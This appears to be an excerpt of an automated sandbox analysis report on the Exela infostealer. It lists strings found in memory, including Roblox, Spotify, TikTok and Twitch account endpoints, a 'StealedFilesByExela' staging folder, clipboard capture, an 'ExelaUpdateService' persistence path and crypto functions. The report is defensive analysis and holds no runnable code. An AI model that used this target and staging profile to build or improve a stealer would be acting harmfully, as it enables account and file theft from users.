Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.attrs.org/en/stable/init.html#hooking-yourself-into-initialization)
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652761806.000001FC7580B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652833038.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652933030.000001FC7580D000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827210327.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827349619.0000023B784AB000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1827119247.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.attrs.org/en/stable/why.html#data-classes).
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656121294.000001FC75815000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784B3000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830677200.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999688240.000002DCD0950000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07B8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1887954156.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960432373.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1733994092.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990364112.000002DCCF707000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1974031828.000002DCCF6FF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976363678.000002DCCF706000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960818465.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1956730714.000002DCCF6F0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD0750000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999688240.000002DCD0950000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960432373.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1960818465.000002DCD1E4C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1730855532.000002DCD1FFF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656220023.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1830837521.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.openssl.org/H
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1975909415.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1989967017.000002DCCF60B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1983700654.000002DCCF609000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969997805.000002DCCF608000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1986134334.000002DCCE890000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662394777.000002DCCED46000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1662353023.000002DCCED6B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/user/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/user/0
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.roblox.com/my/account/json
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.spotify.com/api/account-settings/v1/profile
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1967958889.000002DCCF46B000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1987192175.000002DCCEF1E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.twitch.tv/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://www.twitch.tv/P?
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652670092.000001FC75808000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652635868.000001FC7580F000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826907012.0000023B784AD000.00000004.00000020.00020000.00000000.sdmp, Exela.exe, 00000051.00000003.1826966748.0000023B784A6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.variomedia.de/
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1979336001.000002DCCF0DB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969024366.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1956504995.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969507113.000002DCCF0C2000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1988968795.000002DCCF0E0000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1887859569.000002DCCF085000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1976001517.000002DCCF0DA000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1733430816.000002DCCF075000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://zopeinterface.readthedocs.io/en/latest/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
Creates a window with clipboard capturing capabilities
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands
barindex
Modifies existing user documents (likely ransomware behavior)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.docx Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\UMMBDNEQBN.xlsx Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.pdf Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\KZWFNRXYKI.pdf Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe File deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\VLZDGUKUTZ.docx Jump to behavior
Creates files inside the system directory
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Detected potential crypto function
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA79B8B 0_2_00007FF72AA79B8B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C 0_2_00007FF72AA8842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA96950 0_2_00007FF72AA96950
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA77950 0_2_00007FF72AA77950
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA9789C 0_2_00007FF72AA9789C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA96BCC 0_2_00007FF72AA96BCC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA97350 0_2_00007FF72AA97350
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA83330 0_2_00007FF72AA83330
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA924C4 0_2_00007FF72AA924C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA83CC0 0_2_00007FF72AA83CC0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA88CB0 0_2_00007FF72AA88CB0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA86510 0_2_00007FF72AA86510
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA94CFC 0_2_00007FF72AA94CFC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA82474 0_2_00007FF72AA82474
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8AA10 0_2_00007FF72AA8AA10
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8EA90 0_2_00007FF72AA8EA90
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA88278 0_2_00007FF72AA88278
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA82270 0_2_00007FF72AA82270
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA840C4 0_2_00007FF72AA840C4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA790C0 0_2_00007FF72AA790C0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8F110 0_2_00007FF72AA8F110
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA82884 0_2_00007FF72AA82884
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA91518 0_2_00007FF72AA91518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA94860 0_2_00007FF72AA94860
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA82064 0_2_00007FF72AA82064
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8E5FC 0_2_00007FF72AA8E5FC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA9A5D8 0_2_00007FF72AA9A5D8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA79D2B 0_2_00007FF72AA79D2B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA91518 0_2_00007FF72AA91518
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA8842C 0_2_00007FF72AA8842C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA7A55D 0_2_00007FF72AA7A55D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA82680 0_2_00007FF72AA82680
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA81E60 0_2_00007FF72AA81E60
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C 81_2_00007FF6E3A7842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A69B8B 81_2_00007FF6E3A69B8B
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A86950 81_2_00007FF6E3A86950
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A67950 81_2_00007FF6E3A67950
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A8789C 81_2_00007FF6E3A8789C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A824C4 81_2_00007FF6E3A824C4
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A73CC0 81_2_00007FF6E3A73CC0
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A69D2B 81_2_00007FF6E3A69D2B
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A81518 81_2_00007FF6E3A81518
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A76510 81_2_00007FF6E3A76510
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A84CFC 81_2_00007FF6E3A84CFC
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A72474 81_2_00007FF6E3A72474
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A78CB0 81_2_00007FF6E3A78CB0
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A86BCC 81_2_00007FF6E3A86BCC
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A87350 81_2_00007FF6E3A87350
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A73330 81_2_00007FF6E3A73330
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A72270 81_2_00007FF6E3A72270
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7EA90 81_2_00007FF6E3A7EA90
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A78278 81_2_00007FF6E3A78278
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7AA10 81_2_00007FF6E3A7AA10
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A740C4 81_2_00007FF6E3A740C4
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A690C0 81_2_00007FF6E3A690C0
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7F110 81_2_00007FF6E3A7F110
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A81518 81_2_00007FF6E3A81518
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A72064 81_2_00007FF6E3A72064
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A84860 81_2_00007FF6E3A84860
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A72884 81_2_00007FF6E3A72884
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A71E60 81_2_00007FF6E3A71E60
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A72680 81_2_00007FF6E3A72680
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A8A5D8 81_2_00007FF6E3A8A5D8
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7E5FC 81_2_00007FF6E3A7E5FC
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A7842C 81_2_00007FF6E3A7842C
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: 81_2_00007FF6E3A6A55D 81_2_00007FF6E3A6A55D
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI67602\VCRUNTIME140.dll D66C3B47091CEB3F8D3CC165A43D285AE919211A0C0FCB74491EE574D8D464F8
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pyd FA5A1E7031DE5849AB2AB5A177E366B41E1DF6BBD90C8D2418033A01C740771F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: String function: 00007FF72AA72B10 appears 47 times
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Code function: String function: 00007FF6E3A62B10 appears 47 times
PE file contains executable resources (Code or Archives)
Source: _overlapped.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: _overlapped.pyd.81.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.81.dr Static PE information: Resource name: RT_VERSION type: COM executable for DOS
PE file does not import any functions
Source: python3.dll.0.dr Static PE information: No import functions for PE file found
Source: python3.dll.81.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651004020.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_bz2.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651489697.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_lzma.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651827238.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_socket.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000000.1650559854.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameExela.exej% vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1652100311.000001FC75806000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_uuid.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1656536234.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamepyexpat.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651594328.000001FC75802000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_multiprocessing.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1651915607.000001FC75803000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename_sqlite3.pyd. vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000000.00000003.1657899166.000001FC75808000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesqlite3.dll0 vs SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
